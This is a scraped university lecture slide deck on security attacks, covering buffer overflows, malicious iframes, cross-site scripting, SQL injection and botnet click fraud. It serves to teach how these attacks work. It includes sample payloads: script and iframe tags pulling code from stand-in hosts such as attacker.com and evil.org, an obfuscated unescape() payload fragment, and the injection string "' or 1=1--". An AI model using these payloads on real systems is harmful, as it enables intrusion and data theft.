420 likes | 809 Views
一樣的程式 ( 城市 ), 不一樣的結局 許富皓 資訊工程學系 中央大學. How Fast Could Your Computer Be Comprised?. Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP .
E N D
一樣的程式(城市), 不一樣的結局 許富皓 資訊工程學系 中央大學
How Fast Could Your Computer Be Comprised? • Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP. • Normally it takes only a couple of minutes before it is successfully compromised. • On average, the expected lifespan of the honeypot is less than ten minutes. • After this small amount of time, the honeypot is often successfully exploited by automated malware. • The shortest compromise time was only a few seconds: • Once we plugged the network cable in, an SDBot compromised the machine via an exploit against TCP port 135 and installed itself on the machine.
第一次網路大戰 (2008-12-12 讀者文摘) • 愛沙尼亞是全歐洲網路化程度最高的國家,去年遭受空前的網路攻擊,背後主使者是誰?下一個遭殃的又會是誰? • 超級電腦病毒“Stuxnet”現蹤 伊朗核電廠是最終攻擊目標? (2010/09/24 20:15 鄭杰 綜合報導, 中華電視公司)
Principle of Stack Smashing Attacks • Overwritten control transfer structures, such as return addresses or function pointers, to redirect program execution flow to desired code. • Attack strings carry both code and address(es) of the code entry point.
EIP A Linux Process Layout and Stack Operations main() { : G(1); } void G(int a) { : H(3); } void H(int c) { : } kernel address space high address Libraries heap BSS data code env, argv, argc main stack G H low address
Explanation of BOAs (1) G(int a) { H(3); add_g: } H( int b) { char c[100]; int i=0; while((c[i++]=getch())!=EOF) { } } G’s stack frame b return address add_g H’s stack frame address of G’s frame point ebp C[99] 0xabc c b a 0xabb C[0] 0xaba Input String: abc i esp
Explanation of BOAs (2) Length=108 bytes Attack String: xxInjected Codexy0xabc G(int a) { H(3); add_g: } H( int b) { char c[100]; int i=0; while((c[i++]=getch())!=EOF) { } } X : 1 byte y : 4 bytes b return address add_g addrress oxabc H’s stack frame address of G’s frame point y ebp C[99] x Injected Code 0xabc 0xabb x x C[0] 0xaba i esp
Injected Code: • The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege. • The injected code is already in machine instruction form; therefore, a CPU can directly execute it. • However the above fact also means that the injected code must match the CPU type of the attacked host. • Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.
Memory Address Obfuscation/ASLR - Overview stack seg. stack seg. stack seg. libraries libraries heap seg. libraries heap seg. heap seg. data seg. data seg. data seg. code seg. code seg. code seg.
Mishandling Tag Attribute Values (2)[Julam] <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB : : BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME=“CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC : CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC”> </IFRAME>
Client side WWW Vulnerable browser Good web server Malicious web server bad.htm attacker.com <iframe src=“http://attacker.com/bad.htm” height=0 width=0> </iframe> <script src=http://attacker.com/bad.js></script>
Client side WWW Vulnerable browser Good web server Malicious web server bad.htm attacker.com document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ……… attacker2.com
Through Hyperlinks • An attacker may be able to embed their malicious code within a hyperlink to the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteriawithout validating user supplied input , which consequently forces the execution of code from the evil attackers’ server. • For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A> • In the attack above, one source is inserting code into pages sent by another source. • It should be noted that this attack: • disguises the link as a link to http://trusted.org, • can be easily included in an HTML email message, • does not supply the malicious code inline, but is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime. Web browser trusted.org
How Do You Test If It Is Vulnerable? hi' or 1=1--
Web Application Input and Its Corresponding SQL Query • Take an asp page that will link you to another page with the following URL:http://duck/index.asp?category=foodIn the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code:v_cat = request("category")sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"set rs=conn.execute(sqlstr)As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:SELECT * FROM product WHERE PCategory='food'The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.
Why' or 1=1--? • Now, assume that we change the URL into something like this:http://duck/index.asp?category=food' or 1=1--Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have: SELECT * FROM product WHERE PCategory='food' or 1=1--'The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. • A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). • Sometimes, it may be possible to replace double dash with single hash "#".
DNS Resolution Sequence (2) root domain server
GoogleAdSense Abuse • A similar abuse is also possible with Google's AdSense program: • AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way. • The company earns money due to clicks on these ads, for example per 10,000 clicks in one month. • An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increments the click counter. • This kind of usage for botnets is relatively uncommon, but not a bad idea from an attacker's perspective.
Loss Caused by Click Fraud [Catherine Holahan] • On average, consultants estimate that between 14% and 15% of clicks are fraudulent.
Ampersands (&'s) in URLs [Liam Quinn ] • Always use & in place of & when writing URLs in HTML: • E.g.: <a href="foo.cgi?chapter=1&section=2&copy=3&lang=en">...</a>
Click Fraud (2) – Connect to the Google Server Directly • Attackers could launch the same attacks by • opening a HTTP connection to a Google server and • sending the URL in the previous slide to the above server directly.